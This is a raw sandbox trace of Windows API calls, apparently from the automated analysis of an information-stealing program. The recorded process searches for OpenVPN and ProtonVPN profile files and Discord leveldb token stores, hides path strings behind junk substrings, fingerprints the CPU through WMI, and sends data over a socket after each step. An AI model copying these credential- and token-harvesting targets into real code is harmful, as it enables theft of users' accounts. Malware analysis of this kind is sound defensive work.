ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0199.946] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f020) returned 1 [0199.951] CoCreateGuid (in: pguid=0x36efbc | out: pguid=0x36efbc*(Data1=0x9f95f54f, Data2=0x16a5, Data3=0x4e60, Data4=([0]=0xb7, [1]=0x71, [2]=0x1f, [3]=0x1e, [4]=0xe4, [5]=0xb1, [6]=0x63, [7]=0x31))) returned 0x0 [0199.951] CoCreateGuid (in: pguid=0x36ef00 | out: pguid=0x36ef00*(Data1=0xa40dbeed, Data2=0x89f6, Data3=0x4d51, Data4=([0]=0xa0, [1]=0xae, [2]=0xe8, [3]=0xdf, [4]=0x65, [5]=0xf, [6]=0xd6, [7]=0x95))) returned 0x0 [0199.952] send (s=0x264, buf=0x3b115a7*, len=178, flags=0) returned 178 [0199.953] recv (in: s=0x264, buf=0x23b4890, len=8192, flags=0 | out: buf=0x23b4890*) returned 128 [0200.045] ExpandEnvironmentStringsW (in: lpSrc="%USERPFile.WriteROFILE%", lpDst=0x36f160, nSize=0x64 | out: lpDst="%USERPFile.WriteROFILE%") returned 0x18 [0200.045] ExpandEnvironmentStringsW (in: lpSrc="%USERPFile.WriteROFILE%\\AppFile.WriteData\\RoamiFile.Writeng", lpDst=0x36f160, nSize=0x64 | out: lpDst="%USERPFile.WriteROFILE%\\AppFile.WriteData\\RoamiFile.Writeng") returned 0x3c [0200.265] GetFullPathNameW (in: lpFileName="%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect\\profiles", nBufferLength=0x105, lpBuffer=0x36edbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect\\profiles", lpFilePart=0x0) returned 0x5b [0200.266] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect\\profiles", lpszLongPath=0x36eda8, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0200.267] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect", lpszLongPath=0x36ed70, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0200.268] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f28c) returned 1 [0200.268] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\", lpszLongPath=0x36ed58, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\kEecfMwgj\\") returned 0x13 [0200.269] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect\\profiles", nBufferLength=0x105, lpBuffer=0x36ed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect\\profiles", lpFilePart=0x0) returned 0x5c [0200.269] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Roaming\\OpenVPN Connect\\profiles\\*ovpn", lpFindFileData=0x36f03c | out: lpFindFileData=0x36f03c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0200.269] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36effc) returned 1 [0200.277] CoCreateGuid (in: pguid=0x36efbc | out: pguid=0x36efbc*(Data1=0xef5c7781, Data2=0xb2e1, Data3=0x408c, Data4=([0]=0x92, [1]=0x23, [2]=0x3e, [3]=0xcb, [4]=0xda, [5]=0x94, [6]=0x14, [7]=0xc8))) returned 0x0 [0200.277] CoCreateGuid (in: pguid=0x36ef00 | out: pguid=0x36ef00*(Data1=0x3af327ca, Data2=0x2f47, Data3=0x4436, Data4=([0]=0x8a, [1]=0xc5, [2]=0x25, [3]=0xb0, [4]=0xdf, [5]=0x84, [6]=0xf1, [7]=0xcc))) returned 0x0 [0200.277] send (s=0x264, buf=0x3b115a7*, len=179, flags=0) returned 179 [0200.278] recv (in: s=0x264, buf=0x23b4890, len=8192, flags=0 | out: buf=0x23b4890*) returned 128 [0200.311] ExpandEnvironmentStringsW (in: lpSrc="%USERPserviceInterface.ExtensionROFILE%", lpDst=0x36f16c, nSize=0x64 | out: lpDst="%USERPserviceInterface.ExtensionROFILE%") returned 0x28 [0200.311] ExpandEnvironmentStringsW (in: lpSrc="%USERPserviceInterface.ExtensionROFILE%\\ApserviceInterface.ExtensionpData\\LocaserviceInterface.Extensionl", lpDst=0x36f16c, nSize=0x64 | out: lpDst="%USERPserviceInterface.ExtensionROFILE%\\ApserviceInterface.ExtensionpData\\LocaserviceInterface.Exte6갢") returned 0x6a [0200.312] ExpandEnvironmentStringsW (in: lpSrc="%USERPserviceInterface.ExtensionROFILE%\\ApserviceInterface.ExtensionpData\\LocaserviceInterface.Extensionl", lpDst=0x36f160, nSize=0x6a | out: lpDst="%USERPserviceInterface.ExtensionROFILE%\\ApserviceInterface.ExtensionpData\\LocaserviceInterface.Extensionl") returned 0x6a [0200.312] GetFullPathNameW (in: lpFileName="%USERPROFILE%\\AppData\\Local\\ProtonVPN", nBufferLength=0x105, lpBuffer=0x36edbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Local\\ProtonVPN", lpFilePart=0x0) returned 0x4a [0200.312] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Local\\ProtonVPN", lpszLongPath=0x36eda8, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0200.313] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Local", lpszLongPath=0x36ed6c, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0200.313] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f28c) returned 1 [0200.313] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\", lpszLongPath=0x36ed58, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\kEecfMwgj\\") returned 0x13 [0200.314] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Local\\ProtonVPN", nBufferLength=0x105, lpBuffer=0x36ed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Local\\ProtonVPN", lpFilePart=0x0) returned 0x4b [0200.314] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\%USERPROFILE%\\AppData\\Local\\ProtonVPN\\*ovpn", lpFindFileData=0x36f03c | out: lpFindFileData=0x36f03c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0200.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36effc) returned 1 [0200.321] CoCreateGuid (in: pguid=0x36efbc | out: pguid=0x36efbc*(Data1=0x4a4c9a4c, Data2=0x116d, Data3=0x4bf4, Data4=([0]=0x9e, [1]=0x62, [2]=0x62, [3]=0x72, [4]=0x2a, [5]=0xe8, [6]=0x78, [7]=0x59))) returned 0x0 [0200.321] CoCreateGuid (in: pguid=0x36ef00 | out: pguid=0x36ef00*(Data1=0xcc26f4ac, Data2=0x7563, Data3=0x42d4, Data4=([0]=0x87, [1]=0x47, [2]=0x2b, [3]=0xe3, [4]=0xb1, [5]=0x1b, [6]=0x35, [7]=0x33))) returned 0x0 [0200.321] send (s=0x264, buf=0x3b115a7*, len=167, flags=0) returned 167 [0200.322] recv (in: s=0x264, buf=0x23b4890, len=8192, flags=0 | out: buf=0x23b4890*) returned 128 [0200.459] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x36f0c4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0200.459] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\discord\\Local Storage\\leveldb", lpDst=0x36f0c4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\discord\\Local Storage\\leveldb") returned 0x41 [0200.459] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\discord\\Local Storage\\leveldb", nBufferLength=0x105, lpBuffer=0x36ed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\discord\\Local Storage\\leveldb", lpFilePart=0x0) returned 0x40 [0200.459] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1ec) returned 1 [0200.459] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\discord\\Local Storage\\leveldb", nBufferLength=0x105, lpBuffer=0x36eccc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\discord\\Local Storage\\leveldb", lpFilePart=0x0) returned 0x40 [0200.460] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\discord\\Local Storage\\leveldb\\*.log", lpFindFileData=0x36ef9c | out: lpFindFileData=0x36ef9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0200.460] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef5c) returned 1 [0200.462] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\discord\\Local Storage\\leveldb", nBufferLength=0x105, lpBuffer=0x36ed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\discord\\Local Storage\\leveldb", lpFilePart=0x0) returned 0x40 [0200.462] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1ec) returned 1 [0200.462] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\discord\\Local Storage\\leveldb", nBufferLength=0x105, lpBuffer=0x36eccc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\discord\\Local Storage\\leveldb", lpFilePart=0x0) returned 0x40 [0200.463] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\discord\\Local Storage\\leveldb\\*.ldb", lpFindFileData=0x36ef9c | out: lpFindFileData=0x36ef9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0200.463] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef5c) returned 1 [0200.472] CoCreateGuid (in: pguid=0x36efb8 | out: pguid=0x36efb8*(Data1=0x510104d7, Data2=0xf7e9, Data3=0x4a93, Data4=([0]=0xa7, [1]=0x61, [2]=0x9, [3]=0xd3, [4]=0x71, [5]=0xf0, [6]=0x45, [7]=0x10))) returned 0x0 [0200.472] CoCreateGuid (in: pguid=0x36eefc | out: pguid=0x36eefc*(Data1=0x5c4a34c1, Data2=0x734e, Data3=0x4324, Data4=([0]=0xab, [1]=0xc4, [2]=0x8c, [3]=0xac, [4]=0x3b, [5]=0xf0, [6]=0x8e, [7]=0xc4))) returned 0x0 [0200.562] send (s=0x264, buf=0x3b115a7*, len=213, flags=0) returned 213 [0200.563] recv (in: s=0x264, buf=0x23b4890, len=8192, flags=0 | out: buf=0x23b4890*) returned 128 [0200.677] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f264 | out: puCount=0x36f264*=0x2) returned 0x0 [0200.677] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f260*=0x0, pszText=0x0 | out: puBuffLength=0x36f260*=0xf, pszText=0x0) returned 0x0 [0200.678] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f260*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f260*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0200.678] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1ec | out: ppv=0x36f1ec*=0x6ee4bc) returned 0x0 [0200.679] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1e4 | out: pAptType=0x36f1e4*=1) returned 0x0 [0200.679] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1e8 | out: ppvObject=0x36f1e8*=0x0) returned 0x80004002 [0200.679] IUnknown:Release (This=0x6ee4bc) returned 0x0 [0200.680] CoGetClassObject (in: rclsid=0x761b14*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36ee08 | out: ppv=0x36ee08*=0x787a40) returned 0x0 [0200.681] WbemLocator:IUnknown:QueryInterface (in: This=0x787a40, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36f020 | out: ppvObject=0x36f020*=0x0) returned 0x80004002 [0200.681] WbemLocator:IClassFactory:CreateInstance (in: This=0x787a40, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f02c | out: ppvObject=0x36f02c*=0x769418) returned 0x0 [0200.681] WbemLocator:IUnknown:Release (This=0x787a40) returned 0x0 [0200.681] WbemLocator:IUnknown:QueryInterface (in: This=0x769418, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ec4c | out: ppvObject=0x36ec4c*=0x769418) returned 0x0 [0200.681] WbemLocator:IUnknown:QueryInterface (in: This=0x769418, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36ec00 | out: ppvObject=0x36ec00*=0x0) returned 0x80004002 [0200.682] WbemLocator:IUnknown:AddRef (This=0x769418) returned 0x3 [0200.682] WbemLocator:IUnknown:QueryInterface (in: This=0x769418, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e55c | out: ppvObject=0x36e55c*=0x0) returned 0x80004002 [0200.682] WbemLocator:IUnknown:QueryInterface (in: This=0x769418, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e50c | out: ppvObject=0x36e50c*=0x0) returned 0x80004002 [0200.682] WbemLocator:IUnknown:QueryInterface (in: This=0x769418, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e518 | out: ppvObject=0x36e518*=0x0) returned 0x80004002 [0200.682] CoGetContextToken (in: pToken=0x36e578 | out: pToken=0x36e578) returned 0x0 [0200.682] CoGetObjectContext (in: riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x787a44 | out: ppv=0x787a44*=0x6ee4b0) returned 0x0 [0200.682] CoGetContextToken (in: pToken=0x36e98c | out: pToken=0x36e98c) returned 0x0 [0200.682] WbemLocator:IUnknown:QueryInterface (in: This=0x769418, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ea0c | out: ppvObject=0x36ea0c*=0x0) returned 0x80004002 [0200.682] WbemLocator:IUnknown:Release (This=0x769418) returned 0x2 [0200.682] WbemLocator:IUnknown:Release (This=0x769418) returned 0x1 [0200.682] CoGetContextToken (in: pToken=0x36f00c | out: pToken=0x36f00c) returned 0x0 [0200.682] CoGetContextToken (in: pToken=0x36ef6c | out: pToken=0x36ef6c) returned 0x0 [0200.682] WbemLocator:IUnknown:QueryInterface (in: This=0x769418, riid=0x36f03c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36f038 | out: ppvObject=0x36f038*=0x769418) returned 0x0 [0200.682] WbemLocator:IUnknown:AddRef (This=0x769418) returned 0x3 [0200.682] WbemLocator:IUnknown:Release (This=0x769418) returned 0x2 [0200.683] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1c8 | out: puCount=0x36f1c8*=0x2) returned 0x0 [0200.683] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=8, puBuffLength=0x36f1c4*=0x0, pszText=0x0 | out: puBuffLength=0x36f1c4*=0xf, pszText=0x0) returned 0x0 [0200.683] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=8, puBuffLength=0x36f1c4*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1c4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0200.683] CoCreateInstance (in: rclsid=0x727c3734*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x727c3794*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x36f074 | out: ppv=0x36f074*=0x769448) returned 0x0 [0200.683] WbemLocator:IWbemLocator:ConnectServer (in: This=0x769448, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x36f114 | out: ppNamespace=0x36f114*=0x712588) returned 0x0 [0200.709] WbemLocator:IUnknown:QueryInterface (in: This=0x712588, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ef98 | out: ppvObject=0x36ef98*=0x784b24) returned 0x0 [0200.709] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x784b24, pProxy=0x712588, pAuthnSvc=0x36efe8, pAuthzSvc=0x36efe4, pServerPrincName=0x36efdc, pAuthnLevel=0x36efe0, pImpLevel=0x36efd0, pAuthInfo=0x36efd4, pCapabilites=0x36efd8 | out: pAuthnSvc=0x36efe8*=0xa, pAuthzSvc=0x36efe4*=0x0, pServerPrincName=0x36efdc, pAuthnLevel=0x36efe0*=0x6, pImpLevel=0x36efd0*=0x2, pAuthInfo=0x36efd4, pCapabilites=0x36efd8*=0x1) returned 0x0 [0200.709] WbemLocator:IUnknown:Release (This=0x784b24) returned 0x1 [0200.709] WbemLocator:IUnknown:QueryInterface (in: This=0x712588, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ef8c | out: ppvObject=0x36ef8c*=0x784b44) returned 0x0 [0200.709] WbemLocator:IUnknown:QueryInterface (in: This=0x712588, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ef78 | out: ppvObject=0x36ef78*=0x784b24) returned 0x0 [0200.709] WbemLocator:IClientSecurity:SetBlanket (This=0x784b24, pProxy=0x712588, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0200.710] WbemLocator:IUnknown:Release (This=0x784b24) returned 0x2 [0200.710] WbemLocator:IUnknown:Release (This=0x784b44) returned 0x1 [0200.710] CoTaskMemFree (pv=0x793e28) [0200.710] WbemLocator:IUnknown:AddRef (This=0x712588) returned 0x2 [0200.710] WbemLocator:IUnknown:Release (This=0x769448) returned 0x0 [0200.711] CoGetContextToken (in: pToken=0x36e4cc | out: pToken=0x36e4cc) returned 0x0 [0200.711] CoGetContextToken (in: pToken=0x36e8dc | out: pToken=0x36e8dc) returned 0x0 [0200.711] WbemLocator:IUnknown:QueryInterface (in: This=0x712588, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e878 | out: ppvObject=0x36e878*=0x784b2c) returned 0x0 [0200.711] WbemLocator:IRpcOptions:Query (in: This=0x784b2c, pPrx=0x787a58, dwProperty=2, pdwValue=0x36e96c | out: pdwValue=0x36e96c) returned 0x80004002 [0200.711] WbemLocator:IUnknown:Release (This=0x784b2c) returned 0x2 [0200.711] CoGetContextToken (in: pToken=0x36eeac | out: pToken=0x36eeac) returned 0x0 [0200.711] CoGetContextToken (in: pToken=0x36ee0c | out: pToken=0x36ee0c) returned 0x0 [0200.711] WbemLocator:IUnknown:QueryInterface (in: This=0x712588, riid=0x36eedc*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x36eda8 | out: ppvObject=0x36eda8*=0x712588) returned 0x0 [0200.712] WbemLocator:IUnknown:Release (This=0x712588) returned 0x2 [0200.712] SysStringLen (param_1=0x0) returned 0x0 [0200.712] CoGetContextToken (in: pToken=0x36efcc | out: pToken=0x36efcc) returned 0x0 [0200.712] IWbemServices:ExecQuery (in: This=0x712588, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Processor", lFlags=16, pCtx=0x0, ppEnum=0x36f1d4 | out: ppEnum=0x36f1d4*=0x70f928) returned 0x0 [0200.716] IUnknown:QueryInterface (in: This=0x70f928, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f030 | out: ppvObject=0x36f030*=0x70f92c) returned 0x0 [0200.716] IClientSecurity:QueryBlanket (in: This=0x70f92c, pProxy=0x70f928, pAuthnSvc=0x36f080, pAuthzSvc=0x36f07c, pServerPrincName=0x36f074, pAuthnLevel=0x36f078, pImpLevel=0x36f068, pAuthInfo=0x36f06c, pCapabilites=0x36f070 | out: pAuthnSvc=0x36f080*=0xa, pAuthzSvc=0x36f07c*=0x0, pServerPrincName=0x36f074, pAuthnLevel=0x36f078*=0x6, pImpLevel=0x36f068*=0x2, pAuthInfo=0x36f06c, pCapabilites=0x36f070*=0x1) returned 0x0 [0200.716] IUnknown:Release (This=0x70f92c) returned 0x1 [0200.716] IUnknown:QueryInterface (in: This=0x70f928, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f024 | out: ppvObject=0x36f024*=0x784a54) returned 0x0 [0200.716] IUnknown:QueryInterface (in: This=0x70f928, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f010 | out: ppvObject=0x36f010*=0x70f92c) returned 0x0 [0200.716] IClientSecurity:SetBlanket (This=0x70f92c, pProxy=0x70f928, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0200.718] IUnknown:Release (This=0x70f92c) returned 0x2 [0200.718] WbemLocator:IUnknown:Release (This=0x784a54) returned 0x1 [0200.718] CoTaskMemFree (pv=0x793e88) [0200.718] IUnknown:AddRef (This=0x70f928) returned 0x2 [0200.719] CoGetContextToken (in: pToken=0x36e550 | out: pToken=0x36e550) returned 0x0 [0200.719] CoGetContextToken (in: pToken=0x36e964 | out: pToken=0x36e964) returned 0x0 [0200.719] IUnknown:QueryInterface (in: This=0x70f928, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e8fc | out: ppvObject=0x36e8fc*=0x784a3c) returned 0x0 [0200.719] WbemLocator:IRpcOptions:Query (in: This=0x784a3c, pPrx=0x787ad0, dwProperty=2, pdwValue=0x36e9f0 | out: pdwValue=0x36e9f0) returned 0x80004002 [0200.719] WbemLocator:IUnknown:Release (This=0x784a3c) returned 0x2 [0200.719] CoGetContextToken (in: pToken=0x36ef34 | out: pToken=0x36ef34) returned 0x0 [0200.719] CoGetContextToken (in: pToken=0x36ee94 | out: pToken=0x36ee94) returned 0x0 [0200.719] IUnknown:QueryInterface (in: This=0x70f928, riid=0x36ef64*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x36ee30 | out: ppvObject=0x36ee30*=0x70f928) returned 0x0 [0200.720] IUnknown:Release (This=0x70f928) returned 0x2 [0200.720] SysStringLen (param_1=0x0) returned 0x0 [0200.720] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f220 | out: puCount=0x36f220*=0x2) returned 0x0 [0200.720] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, 